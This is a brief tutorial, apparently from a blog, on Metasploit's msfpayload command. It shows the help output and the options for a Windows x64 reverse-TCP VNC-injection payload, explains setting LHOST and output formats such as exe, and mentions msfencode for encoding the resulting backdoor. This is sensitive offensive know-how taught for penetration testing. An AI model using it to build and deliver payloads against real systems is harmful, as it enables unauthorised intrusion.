msfpayload: the Metasploit command for generating shellcode

[bash]

root@ieroot:~# msfpayload -h

Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>

OPTIONS:

-h Help banner
-l List available payloads

root@ieroot:~#

[/bash]

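It can generate payloads in a variety of formats; the format is chosen with the last argument shown in the usage line above.

msfpayload is used in much the same way as msfcli.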

[bash]

root@ieroot:~# msfpayload windows/x64/vncinject/reverse_tcp o

Name: Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
Module: payload/windows/x64/vncinject/reverse_tcp
Version: 14774, 15548, 14976
Platform: Windows
Arch: x86_64
Needs Admin: No
Total size: 422
Rank: Normal

Provided by:
sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
AUTOVNC   true             yes       Automatically launch VNC viewer if present
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port
VNCHOST   127.0.0.1        yes       The local host to use for the VNC proxy
VNCPORT   5900             yes       The local port to use for the VNC proxy

Description:
Connect back to the attacker (Windows x64), Inject a VNC Dll via a
reflective loader (Windows x64) (staged)
root@ieroot:~#

[/bash]

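The rest is self-explanatory. Options are set in the form LHOST=192.168.0.222. Use the lowercase letter o to view a payload's options. The output format is selected with C, J, X, and so on.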

In addition, msfencode can be used to encode the generated payload (call it a payload or a backdoor, either works).

msfencode -l lists the available encoders.

msfencode -h shows the help.
